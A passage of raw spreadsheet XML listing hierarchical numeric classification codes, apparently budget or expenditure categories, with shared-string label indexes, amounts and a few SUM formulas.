      <c r="B437" s="705" t="s">
        <v>1234</v>
      </c>
      <c r="C437" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="438" ht="17.1" customHeight="1" spans="1:3">
      <c r="A438" s="705">
        <v>2050904</v>
      </c>
      <c r="B438" s="705" t="s">
        <v>1235</v>
      </c>
      <c r="C438" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="439" ht="17.1" customHeight="1" spans="1:3">
      <c r="A439" s="705">
        <v>2050905</v>
      </c>
      <c r="B439" s="705" t="s">
        <v>1236</v>
      </c>
      <c r="C439" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="440" ht="17.1" customHeight="1" spans="1:3">
      <c r="A440" s="705">
        <v>2050999</v>
      </c>
      <c r="B440" s="705" t="s">
        <v>1237</v>
      </c>
      <c r="C440" s="707">
        <v>2533</v>
      </c>
    </row>
    <row r="441" ht="17.1" customHeight="1" spans="1:3">
      <c r="A441" s="705">
        <v>20599</v>
      </c>
      <c r="B441" s="706" t="s">
        <v>1238</v>
      </c>
      <c r="C441" s="269">
        <v>1493</v>
      </c>
    </row>
    <row r="442" ht="17.1" customHeight="1" spans="1:3">
      <c r="A442" s="705">
        <v>2059999</v>
      </c>
      <c r="B442" s="705" t="s">
        <v>1239</v>
      </c>
      <c r="C442" s="707">
        <v>1493</v>
      </c>
    </row>
    <row r="443" ht="17.1" customHeight="1" spans="1:3">
      <c r="A443" s="705">
        <v>206</v>
      </c>
      <c r="B443" s="706" t="s">
        <v>1240</v>
      </c>
      <c r="C443" s="269">
        <v>871</v>
      </c>
    </row>
    <row r="444" ht="17.1" customHeight="1" spans="1:3">
      <c r="A444" s="705">
        <v>20601</v>
      </c>
      <c r="B444" s="706" t="s">
        <v>1241</v>
      </c>
      <c r="C444" s="269">
        <v>259</v>
      </c>
    </row>
    <row r="445" ht="17.1" customHeight="1" spans="1:3">
      <c r="A445" s="705">
        <v>2060101</v>
      </c>
      <c r="B445" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C445" s="707">
        <v>248</v>
      </c>
    </row>
    <row r="446" ht="17.1" customHeight="1" spans="1:3">
      <c r="A446" s="705">
        <v>2060102</v>
      </c>
      <c r="B446" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C446" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="447" ht="17.1" customHeight="1" spans="1:3">
      <c r="A447" s="705">
        <v>2060103</v>
      </c>
      <c r="B447" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C447" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="448" ht="17.1" customHeight="1" spans="1:3">
      <c r="A448" s="705">
        <v>2060199</v>
      </c>
      <c r="B448" s="705" t="s">
        <v>1242</v>
      </c>
      <c r="C448" s="707">
        <v>11</v>
      </c>
    </row>
    <row r="449" ht="17.1" customHeight="1" spans="1:3">
      <c r="A449" s="705">
        <v>20602</v>
      </c>
      <c r="B449" s="706" t="s">
        <v>1243</v>
      </c>
      <c r="C449" s="269">
        <v>2</v>
      </c>
    </row>
    <row r="450" ht="17.1" customHeight="1" spans="1:3">
      <c r="A450" s="705">
        <v>2060201</v>
      </c>
      <c r="B450" s="705" t="s">
        <v>1244</v>
      </c>
      <c r="C450" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="451" ht="17.1" customHeight="1" spans="1:3">
      <c r="A451" s="705">
        <v>2060203</v>
      </c>
      <c r="B451" s="705" t="s">
        <v>1245</v>
      </c>
      <c r="C451" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="452" ht="17.1" customHeight="1" spans="1:3">
      <c r="A452" s="705">
        <v>2060204</v>
      </c>
      <c r="B452" s="705" t="s">
        <v>1246</v>
      </c>
      <c r="C452" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="453" ht="17.1" customHeight="1" spans="1:3">
      <c r="A453" s="705">
        <v>2060205</v>
      </c>
      <c r="B453" s="705" t="s">
        <v>1247</v>
      </c>
      <c r="C453" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="454" ht="17.1" customHeight="1" spans="1:3">
      <c r="A454" s="705">
        <v>2060206</v>
      </c>
      <c r="B454" s="705" t="s">
        <v>1248</v>
      </c>
      <c r="C454" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="455" ht="17.1" customHeight="1" spans="1:3">
      <c r="A455" s="705">
        <v>2060207</v>
      </c>
      <c r="B455" s="705" t="s">
        <v>1249</v>
      </c>
      <c r="C455" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="456" ht="17.1" customHeight="1" spans="1:3">
      <c r="A456" s="705">
        <v>2060208</v>
      </c>
      <c r="B456" s="705" t="s">
        <v>1250</v>
      </c>
      <c r="C456" s="707">
        <v>2</v>
      </c>
    </row>
    <row r="457" ht="17.1" customHeight="1" spans="1:3">
      <c r="A457" s="705">
        <v>2060299</v>
      </c>
      <c r="B457" s="705" t="s">
        <v>1251</v>
      </c>
      <c r="C457" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="458" ht="17.1" customHeight="1" spans="1:3">
      <c r="A458" s="705">
        <v>20603</v>
      </c>
      <c r="B458" s="706" t="s">
        <v>1252</v>
      </c>
      <c r="C458" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="459" ht="17.1" customHeight="1" spans="1:3">
      <c r="A459" s="705">
        <v>2060301</v>
      </c>
      <c r="B459" s="705" t="s">
        <v>1244</v>
      </c>
      <c r="C459" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="460" ht="17.1" customHeight="1" spans="1:3">
      <c r="A460" s="705">
        <v>2060302</v>
      </c>
      <c r="B460" s="705" t="s">
        <v>1253</v>
      </c>
      <c r="C460" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="461" ht="17.1" customHeight="1" spans="1:3">
      <c r="A461" s="705">
        <v>2060303</v>
      </c>
      <c r="B461" s="705" t="s">
        <v>1254</v>
      </c>
      <c r="C461" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="462" ht="17.1" customHeight="1" spans="1:3">
      <c r="A462" s="705">
        <v>2060304</v>
      </c>
      <c r="B462" s="705" t="s">
        <v>1255</v>
      </c>
      <c r="C462" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="463" ht="17.1" customHeight="1" spans="1:3">
      <c r="A463" s="705">
        <v>2060399</v>
      </c>
      <c r="B463" s="705" t="s">
        <v>1256</v>
      </c>
      <c r="C463" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="464" ht="17.1" customHeight="1" spans="1:3">
      <c r="A464" s="705">
        <v>20604</v>
      </c>
      <c r="B464" s="706" t="s">
        <v>1257</v>
      </c>
      <c r="C464" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="465" ht="17.1" customHeight="1" spans="1:3">
      <c r="A465" s="705">
        <v>2060401</v>
      </c>
      <c r="B465" s="705" t="s">
        <v>1244</v>
      </c>
      <c r="C465" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="466" ht="17.1" customHeight="1" spans="1:3">
      <c r="A466" s="705">
        <v>2060404</v>
      </c>
      <c r="B466" s="705" t="s">
        <v>1258</v>
      </c>
      <c r="C466" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="467" ht="17.1" customHeight="1" spans="1:3">
      <c r="A467" s="705">
        <v>2060405</v>
      </c>
      <c r="B467" s="705" t="s">
        <v>1259</v>
      </c>
      <c r="C467" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="468" ht="17.1" customHeight="1" spans="1:3">
      <c r="A468" s="705">
        <v>2060499</v>
      </c>
      <c r="B468" s="705" t="s">
        <v>1260</v>
      </c>
      <c r="C468" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="469" ht="17.1" customHeight="1" spans="1:3">
      <c r="A469" s="705">
        <v>20605</v>
      </c>
      <c r="B469" s="706" t="s">
        <v>1261</v>
      </c>
      <c r="C469" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="470" ht="17.1" customHeight="1" spans="1:3">
      <c r="A470" s="705">
        <v>2060501</v>
      </c>
      <c r="B470" s="705" t="s">
        <v>1244</v>
      </c>
      <c r="C470" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="471" ht="17.1" customHeight="1" spans="1:3">
      <c r="A471" s="705">
        <v>2060502</v>
      </c>
      <c r="B471" s="705" t="s">
        <v>1262</v>
      </c>
      <c r="C471" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="472" ht="17.1" customHeight="1" spans="1:3">
      <c r="A472" s="705">
        <v>2060503</v>
      </c>
      <c r="B472" s="705" t="s">
        <v>1263</v>
      </c>
      <c r="C472" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="473" ht="17.1" customHeight="1" spans="1:3">
      <c r="A473" s="705">
        <v>2060599</v>
      </c>
      <c r="B473" s="705" t="s">
        <v>1264</v>
      </c>
      <c r="C473" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="474" ht="17.1" customHeight="1" spans="1:3">
      <c r="A474" s="705">
        <v>20606</v>
      </c>
      <c r="B474" s="706" t="s">
        <v>1265</v>
      </c>
      <c r="C474" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="475" ht="17.1" customHeight="1" spans="1:3">
      <c r="A475" s="705">
        <v>2060601</v>
      </c>
      <c r="B475" s="705" t="s">
        <v>1266</v>
      </c>
      <c r="C475" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="476" ht="17.1" customHeight="1" spans="1:3">
      <c r="A476" s="705">
        <v>2060602</v>
      </c>
      <c r="B476" s="705" t="s">
        <v>1267</v>
      </c>
      <c r="C476" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="477" ht="17.1" customHeight="1" spans="1:3">
      <c r="A477" s="705">
        <v>2060603</v>
      </c>
      <c r="B477" s="705" t="s">
        <v>1268</v>
      </c>
      <c r="C477" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="478" ht="17.1" customHeight="1" spans="1:3">
      <c r="A478" s="705">
        <v>2060699</v>
      </c>
      <c r="B478" s="705" t="s">
        <v>1269</v>
      </c>
      <c r="C478" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="479" ht="17.1" customHeight="1" spans="1:3">
      <c r="A479" s="705">
        <v>20607</v>
      </c>
      <c r="B479" s="706" t="s">
        <v>1270</v>
      </c>
      <c r="C479" s="269">
        <v>150</v>
      </c>
    </row>
    <row r="480" ht="17.1" customHeight="1" spans="1:3">
      <c r="A480" s="705">
        <v>2060701</v>
      </c>
      <c r="B480" s="705" t="s">
        <v>1244</v>
      </c>
      <c r="C480" s="707">
        <v>110</v>
      </c>
    </row>
    <row r="481" ht="17.1" customHeight="1" spans="1:3">
      <c r="A481" s="705">
        <v>2060702</v>
      </c>
      <c r="B481" s="705" t="s">
        <v>1271</v>
      </c>
      <c r="C481" s="707">
        <v>30</v>
      </c>
    </row>
    <row r="482" ht="17.1" customHeight="1" spans="1:3">
      <c r="A482" s="705">
        <v>2060703</v>
      </c>
      <c r="B482" s="705" t="s">
        <v>1272</v>
      </c>
      <c r="C482" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="483" ht="17.1" customHeight="1" spans="1:3">
      <c r="A483" s="705">
        <v>2060704</v>
      </c>
      <c r="B483" s="705" t="s">
        <v>1273</v>
      </c>
      <c r="C483" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="484" ht="17.1" customHeight="1" spans="1:3">
      <c r="A484" s="705">
        <v>2060705</v>
      </c>
      <c r="B484" s="705" t="s">
        <v>1274</v>
      </c>
      <c r="C484" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="485" ht="17.1" customHeight="1" spans="1:3">
      <c r="A485" s="705">
        <v>2060799</v>
      </c>
      <c r="B485" s="705" t="s">
        <v>1275</v>
      </c>
      <c r="C485" s="707">
        <v>10</v>
      </c>
    </row>
    <row r="486" ht="17.1" customHeight="1" spans="1:3">
      <c r="A486" s="705">
        <v>20608</v>
      </c>
      <c r="B486" s="706" t="s">
        <v>1276</v>
      </c>
      <c r="C486" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="487" ht="17.1" customHeight="1" spans="1:3">
      <c r="A487" s="705">
        <v>2060801</v>
      </c>
      <c r="B487" s="705" t="s">
        <v>1277</v>
      </c>
      <c r="C487" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="488" ht="17.1" customHeight="1" spans="1:3">
      <c r="A488" s="705">
        <v>2060802</v>
      </c>
      <c r="B488" s="705" t="s">
        <v>1278</v>
      </c>
      <c r="C488" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="489" ht="17.1" customHeight="1" spans="1:3">
      <c r="A489" s="705">
        <v>2060899</v>
      </c>
      <c r="B489" s="705" t="s">
        <v>1279</v>
      </c>
      <c r="C489" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="490" ht="17.1" customHeight="1" spans="1:3">
      <c r="A490" s="705">
        <v>20609</v>
      </c>
      <c r="B490" s="706" t="s">
        <v>1280</v>
      </c>
      <c r="C490" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="491" ht="17.1" customHeight="1" spans="1:3">
      <c r="A491" s="705">
        <v>2060901</v>
      </c>
      <c r="B491" s="705" t="s">
        <v>1281</v>
      </c>
      <c r="C491" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="492" ht="17.1" customHeight="1" spans="1:3">
      <c r="A492" s="705">
        <v>2060902</v>
      </c>
      <c r="B492" s="705" t="s">
        <v>1282</v>
      </c>
      <c r="C492" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="493" ht="17.1" customHeight="1" spans="1:3">
      <c r="A493" s="705">
        <v>2060999</v>
      </c>
      <c r="B493" s="705" t="s">
        <v>1283</v>
      </c>
      <c r="C493" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="494" ht="17.1" customHeight="1" spans="1:3">
      <c r="A494" s="705">
        <v>20699</v>
      </c>
      <c r="B494" s="706" t="s">
        <v>1284</v>
      </c>
      <c r="C494" s="269">
        <v>460</v>
      </c>
    </row>
    <row r="495" ht="17.1" customHeight="1" spans="1:3">
      <c r="A495" s="705">
        <v>2069901</v>
      </c>
      <c r="B495" s="705" t="s">
        <v>1285</v>
      </c>
      <c r="C495" s="707">
        <v>120</v>
      </c>
    </row>
    <row r="496" ht="17.1" customHeight="1" spans="1:3">
      <c r="A496" s="705">
        <v>2069902</v>
      </c>
      <c r="B496" s="705" t="s">
        <v>1286</v>
      </c>
      <c r="C496" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="497" ht="17.1" customHeight="1" spans="1:3">
      <c r="A497" s="705">
        <v>2069903</v>
      </c>
      <c r="B497" s="705" t="s">
        <v>1287</v>
      </c>
      <c r="C497" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="498" ht="17.1" customHeight="1" spans="1:3">
      <c r="A498" s="705">
        <v>2069999</v>
      </c>
      <c r="B498" s="705" t="s">
        <v>1288</v>
      </c>
      <c r="C498" s="707">
        <v>340</v>
      </c>
    </row>
    <row r="499" ht="17.1" customHeight="1" spans="1:3">
      <c r="A499" s="705">
        <v>207</v>
      </c>
      <c r="B499" s="706" t="s">
        <v>1289</v>
      </c>
      <c r="C499" s="269">
        <v>2957</v>
      </c>
    </row>
    <row r="500" ht="17.1" customHeight="1" spans="1:3">
      <c r="A500" s="705">
        <v>20701</v>
      </c>
      <c r="B500" s="706" t="s">
        <v>1290</v>
      </c>
      <c r="C500" s="269">
        <f>SUM(C501:C515)</f>
        <v>1434</v>
      </c>
    </row>
    <row r="501" ht="17.1" customHeight="1" spans="1:3">
      <c r="A501" s="705">
        <v>2070101</v>
      </c>
      <c r="B501" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C501" s="707">
        <v>1434</v>
      </c>
    </row>
    <row r="502" ht="17.1" customHeight="1" spans="1:3">
      <c r="A502" s="705">
        <v>2070102</v>
      </c>
      <c r="B502" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C502" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="503" ht="17.1" customHeight="1" spans="1:3">
      <c r="A503" s="705">
        <v>2070103</v>
      </c>
      <c r="B503" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C503" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="504" ht="17.1" customHeight="1" spans="1:3">
      <c r="A504" s="705">
        <v>2070104</v>
      </c>
      <c r="B504" s="705" t="s">
        <v>1291</v>
      </c>
      <c r="C504" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="505" ht="17.1" customHeight="1" spans="1:3">
      <c r="A505" s="705">
        <v>2070105</v>
      </c>
      <c r="B505" s="705" t="s">
        <v>1292</v>
      </c>
      <c r="C505" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="506" ht="17.1" customHeight="1" spans="1:3">
      <c r="A506" s="705">
        <v>2070106</v>
      </c>
      <c r="B506" s="705" t="s">
        <v>1293</v>
      </c>
      <c r="C506" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="507" ht="17.1" customHeight="1" spans="1:3">
      <c r="A507" s="705">
        <v>2070107</v>
      </c>
      <c r="B507" s="705" t="s">
        <v>1294</v>
      </c>
      <c r="C507" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="508" ht="17.1" customHeight="1" spans="1:3">
      <c r="A508" s="705">
        <v>2070108</v>
      </c>
      <c r="B508" s="705" t="s">
        <v>1295</v>
      </c>
      <c r="C508" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="509" ht="17.1" customHeight="1" spans="1:3">
      <c r="A509" s="705">
        <v>2070109</v>
      </c>
      <c r="B509" s="705" t="s">
        <v>1296</v>
      </c>
      <c r="C509" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="510" ht="17.1" customHeight="1" spans="1:3">
      <c r="A510" s="705">
        <v>2070110</v>
      </c>
      <c r="B510" s="705" t="s">
        <v>1297</v>
      </c>
      <c r="C510" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="511" ht="17.1" customHeight="1" spans="1:3">
      <c r="A511" s="705">
        <v>2070111</v>
      </c>
      <c r="B511" s="705" t="s">
        <v>1298</v>
      </c>
      <c r="C511" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="512" ht="17.1" customHeight="1" spans="1:3">
      <c r="A512" s="705">
        <v>2070112</v>
      </c>
      <c r="B512" s="705" t="s">
        <v>1299</v>
      </c>
      <c r="C512" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="513" ht="17.1" customHeight="1" spans="1:3">
      <c r="A513" s="705">
        <v>2070113</v>
      </c>
      <c r="B513" s="705" t="s">
        <v>1300</v>
      </c>
      <c r="C513" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="514" ht="17.1" customHeight="1" spans="1:3">
      <c r="A514" s="705">
        <v>2070114</v>
      </c>
      <c r="B514" s="705" t="s">
        <v>1301</v>
      </c>
      <c r="C514" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="515" ht="17.1" customHeight="1" spans="1:3">
      <c r="A515" s="705">
        <v>2070199</v>
      </c>
      <c r="B515" s="705" t="s">
        <v>1302</v>
      </c>
      <c r="C515" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="516" ht="17.1" customHeight="1" spans="1:3">
      <c r="A516" s="705">
        <v>20702</v>
      </c>
      <c r="B516" s="706" t="s">
        <v>1303</v>
      </c>
      <c r="C516" s="269">
        <f>SUM(C517:C523)</f>
        <v>56</v>
      </c>
    </row>
    <row r="517" ht="17.1" customHeight="1" spans="1:3">
      <c r="A517" s="705">
        <v>2070201</v>
      </c>
      <c r="B517" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C517" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="518" ht="17.1" customHeight="1" spans="1:3">
      <c r="A518" s="705">
        <v>2070202</v>
      </c>
      <c r="B518" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C518" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="519" ht="17.1" customHeight="1" spans="1:3">
      <c r="A519" s="705">
        <v>2070203</v>
      </c>
      <c r="B519" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C519" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="520" ht="17.1" customHeight="1" spans="1:3">
      <c r="A520" s="705">
        <v>2070204</v>
      </c>
      <c r="B520" s="705" t="s">
        <v>1304</v>
      </c>
      <c r="C520" s="707">
        <v>6</v>
      </c>
    </row>
    <row r="521" ht="17.1" customHeight="1" spans="1:3">
      <c r="A521" s="705">
        <v>2070205</v>
      </c>
      <c r="B521" s="705" t="s">
        <v>1305</v>
      </c>
      <c r="C521" s="707">
        <v>50</v>
      </c>
    </row>
    <row r="522" ht="17.1" customHeight="1" spans="1:3">
      <c r="A522" s="705">
        <v>2070206</v>
      </c>
      <c r="B522" s="705" t="s">
        <v>1306</v>
      </c>
      <c r="C522" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="523" ht="17.1" customHeight="1" spans="1:3">
      <c r="A523" s="705">
        <v>2070299</v>
      </c>
      <c r="B523" s="705" t="s">
        <v>1307</v>
      </c>
      <c r="C523" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="524" ht="17.1" customHeight="1" spans="1:3">
      <c r="A524" s="705">
        <v>20703</v>
      </c>
      <c r="B524" s="706" t="s">
        <v>1308</v>
      </c>
      <c r="C524" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="525" ht="17.1" customHeight="1" spans="1:3">
      <c r="A525" s="705">
        <v>2070301</v>
      </c>
      <c r="B525" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C525" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="526" ht="17.1" customHeight="1" spans="1:3">
      <c r="A526" s="705">
        <v>2070302</v>
      </c>
      <c r="B526" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C526" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="527" ht="17.1" customHeight="1" spans="1:3">
      <c r="A527" s="705">
        <v>2070303</v>
      </c>
      <c r="B527" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C527" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="528" ht="17.1" customHeight="1" spans="1:3">
      <c r="A528" s="705">
        <v>2070304</v>
      </c>
      <c r="B528" s="705" t="s">
        <v>1309</v>
      </c>
      <c r="C528" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="529" ht="17.1" customHeight="1" spans="1:3">
      <c r="A529" s="705">
        <v>2070305</v>
      </c>
      <c r="B529" s="705" t="s">
        <v>1310</v>
      </c>
      <c r="C529" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="530" ht="17.1" customHeight="1" spans="1:3">
      <c r="A530" s="705">
        <v>2070306</v>
      </c>
      <c r="B530" s="705" t="s">
        <v>1311</v>
      </c>
      <c r="C530" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="531" ht="17.1" customHeight="1" spans="1:3">
      <c r="A531" s="705">
        <v>2070307</v>
      </c>
      <c r="B531" s="705" t="s">
        <v>1312</v>
      </c>
      <c r="C531" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="532" ht="17.1" customHeight="1" spans="1:3">
      <c r="A532" s="705">
        <v>2070308</v>
      </c>
      <c r="B532" s="705" t="s">
        <v>1313</v>
      </c>
      <c r="C532" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="533" ht="17.1" customHeight="1" spans="1:3">
      <c r="A533" s="705">
        <v>2070309</v>
      </c>
      <c r="B533" s="705" t="s">
        <v>1314</v>
      </c>
      <c r="C533" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="534" ht="17.1" customHeight="1" spans="1:3">
      <c r="A534" s="705">
        <v>2070399</v>
      </c>
      <c r="B534" s="705" t="s">
        <v>1315</v>
      </c>
      <c r="C534" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="535" ht="17.1" customHeight="1" spans="1:3">
      <c r="A535" s="705">
        <v>20706</v>
      </c>
      <c r="B535" s="706" t="s">
        <v>1316</v>
      </c>
      <c r="C535" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="536" ht="17.1" customHeight="1" spans="1:3">
      <c r="A536" s="705">
        <v>2070601</v>
      </c>
      <c r="B536" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C536" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="537" ht="17.1" customHeight="1" spans="1:3">
      <c r="A537" s="705">
        <v>2070602</v>
      </c>
      <c r="B537" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C537" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="538" ht="17.1" customHeight="1" spans="1:3">
      <c r="A538" s="705">
        <v>2070603</v>
      </c>
      <c r="B538" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C538" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="539" ht="17.1" customHeight="1" spans="1:3">
      <c r="A539" s="705">
        <v>2070604</v>
      </c>
      <c r="B539" s="705" t="s">
        <v>1317</v>
      </c>
      <c r="C539" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="540" ht="17.1" customHeight="1" spans="1:3">
      <c r="A540" s="705">
        <v>2070605</v>
      </c>
      <c r="B540" s="705" t="s">
        <v>1318</v>
      </c>
      <c r="C540" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="541" ht="17.1" customHeight="1" spans="1:3">
      <c r="A541" s="705">
        <v>2070606</v>
      </c>
      <c r="B541" s="705" t="s">
        <v>1319</v>
      </c>
      <c r="C541" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="542" ht="17.1" customHeight="1" spans="1:3">
      <c r="A542" s="705">
        <v>2070607</v>
      </c>
      <c r="B542" s="705" t="s">
        <v>1320</v>
      </c>
      <c r="C542" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="543" ht="17.1" customHeight="1" spans="1:3">
      <c r="A543" s="705">
        <v>2070699</v>
      </c>
      <c r="B543" s="705" t="s">
        <v>1321</v>
      </c>
      <c r="C543" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="544" ht="17.1" customHeight="1" spans="1:3">
      <c r="A544" s="705">
        <v>20708</v>
      </c>
      <c r="B544" s="706" t="s">
        <v>1322</v>
      </c>
      <c r="C544" s="269">
        <f>SUM(C545:C551)</f>
        <v>1251</v>
      </c>
    </row>
    <row r="545" ht="17.1" customHeight="1" spans="1:3">
      <c r="A545" s="705">
        <v>2070801</v>
      </c>
      <c r="B545" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C545" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="546" ht="17.1" customHeight="1" spans="1:3">
      <c r="A546" s="705">
        <v>2070802</v>
      </c>
      <c r="B546" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C546" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="547" ht="17.1" customHeight="1" spans="1:3">
      <c r="A547" s="705">
        <v>2070803</v>
      </c>
      <c r="B547" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C547" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="548" ht="17.1" customHeight="1" spans="1:3">
      <c r="A548" s="705">
        <v>2070806</v>
      </c>
      <c r="B548" s="705" t="s">
        <v>1323</v>
      </c>
      <c r="C548" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="549" ht="17.1" customHeight="1" spans="1:3">
      <c r="A549" s="705">
        <v>2070807</v>
      </c>
      <c r="B549" s="705" t="s">
        <v>1324</v>
      </c>
      <c r="C549" s="707">
        <v>61</v>
      </c>
    </row>
    <row r="550" ht="17.1" customHeight="1" spans="1:3">
      <c r="A550" s="705">
        <v>2070808</v>
      </c>
      <c r="B550" s="705" t="s">
        <v>1325</v>
      </c>
      <c r="C550" s="707">
        <v>1190</v>
      </c>
    </row>
    <row r="551" ht="17.1" customHeight="1" spans="1:3">
      <c r="A551" s="705">
        <v>2070899</v>
      </c>
      <c r="B551" s="705" t="s">
        <v>1326</v>
      </c>
      <c r="C551" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="552" ht="17.1" customHeight="1" spans="1:3">
      <c r="A552" s="705">
        <v>20799</v>
      </c>
      <c r="B552" s="706" t="s">
        <v>1327</v>
      </c>
      <c r="C552" s="269">
        <v>216</v>
      </c>
    </row>
    <row r="553" ht="17.1" customHeight="1" spans="1:3">
      <c r="A553" s="705">
        <v>2079902</v>
      </c>
      <c r="B553" s="705" t="s">
        <v>1328</v>
      </c>
      <c r="C553" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="554" ht="17.1" customHeight="1" spans="1:3">
      <c r="A554" s="705">
        <v>2079903</v>
      </c>
      <c r="B554" s="705" t="s">
        <v>1329</v>
      </c>
      <c r="C554" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="555" ht="17.1" customHeight="1" spans="1:3">
      <c r="A555" s="705">
        <v>2079999</v>
      </c>
      <c r="B555" s="705" t="s">
        <v>1330</v>
      </c>
      <c r="C555" s="707">
        <v>216</v>
      </c>
    </row>
    <row r="556" ht="17.1" customHeight="1" spans="1:3">
      <c r="A556" s="705">
        <v>208</v>
      </c>
      <c r="B556" s="706" t="s">
        <v>1331</v>
      </c>
      <c r="C556" s="269">
        <v>107482</v>
      </c>
    </row>
    <row r="557" ht="17.1" customHeight="1" spans="1:3">
      <c r="A557" s="705">
        <v>20801</v>
      </c>
      <c r="B557" s="706" t="s">
        <v>1332</v>
      </c>
      <c r="C557" s="269">
        <f>SUM(C558:C575)</f>
        <v>2742</v>
      </c>
    </row>
    <row r="558" ht="17.1" customHeight="1" spans="1:3">
      <c r="A558" s="705">
        <v>2080101</v>
      </c>
      <c r="B558" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C558" s="707">
        <v>1590</v>
      </c>
    </row>
    <row r="559" ht="17.1" customHeight="1" spans="1:3">
      <c r="A559" s="705">
        <v>2080102</v>
      </c>
      <c r="B559" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C559" s="707">
        <v>15</v>
      </c>
    </row>
